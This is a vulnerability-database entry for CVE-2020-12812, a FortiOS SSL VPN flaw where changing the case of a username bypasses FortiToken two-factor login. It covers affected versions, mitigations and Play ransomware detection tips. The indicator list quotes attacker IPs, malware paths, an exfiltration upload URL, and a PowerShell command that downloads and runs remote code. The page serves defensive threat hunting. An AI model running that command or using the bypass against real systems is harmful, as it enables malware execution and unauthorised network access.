cbcvebase.
CVE-2020-12812
published 2020-07-24

CVE-2020-12812: An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully…

PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
49.34%
98.7th percentile
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.

Affected

5 ranges
VendorProductVersion rangeFixed in
fortinetfortios< 6.0.106.0.10
fortinetfortios
fortinetfortios
fortinetfortios>= 6.2.0 < 6.2.46.2.4
fortinetfortitoken

Detection & IOCsextracted from sources · hover to see the quote

ip185.150.117.186
urlhxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg
ip84.32.190.37
urlhxxp://84.32.190[.]37:80/ahgffxvbghgfv
domainnewspraize.com
domainrealmacnow.com
ip172.67.176.244
ip104.21.43.80
urlhxxp://67.205.182[.]129/u2/upload.php
path%public%\Music\svhost.exe
path%userprofile%\Music\t2747.exe
path%userprofile%\Pictures\socks.exe
path%systemroot%\System32\sok.exe
path%public%\Music\soks.exe
pathC:\PerfLogs\xxx.exe
filenameReadMe.txt
command-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"
  • CVE-2020-12812 exploitation is triggered by changing the case of the username during SSL VPN authentication, allowing bypass of FortiToken 2FA. Detect anomalous SSL VPN logins where the username case differs from the registered account, particularly when LDAP authentication is in use.
  • A misconfigured secondary LDAP Group used as fallback when local LDAP authentication fails is a key enabler of this attack. Audit FortiGate configurations for unnecessary secondary LDAP Groups and remove them to reduce attack surface.
  • Play ransomware ransom notes follow the email format [seven random characters]@gmx[.]com. Hunt for this pattern in ransom note files (ReadMe.txt at C:\) to identify Play infections.
  • Play ransomware uses a PHP-based web page to receive exfiltrated files. Monitor for outbound HTTP POST traffic to PHP upload endpoints (e.g., /u2/upload.php) as an exfiltration indicator.
  • ·CVE-2020-12812 only affects FortiOS versions 6.4.0, 6.2.0 to 6.2.3, and 6.0.9 and below. Patched versions are FortiOS 6.4.1, 6.2.4, and 6.0.10 (released July 2020). Devices running patched versions are not vulnerable.
  • ·The vulnerability requires a specific configuration to be exploitable: local user entries on the FortiGate must require 2FA, be linked to LDAP, and those users must belong to an LDAP group configured on the FortiGate. Devices without this configuration are not vulnerable to the 2FA bypass.
  • ·As a temporary workaround for unpatched systems, Fortinet advises turning off username-case-sensitivity to prevent the 2FA bypass, and disabling all SSL-VPN functions until updates can be applied.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.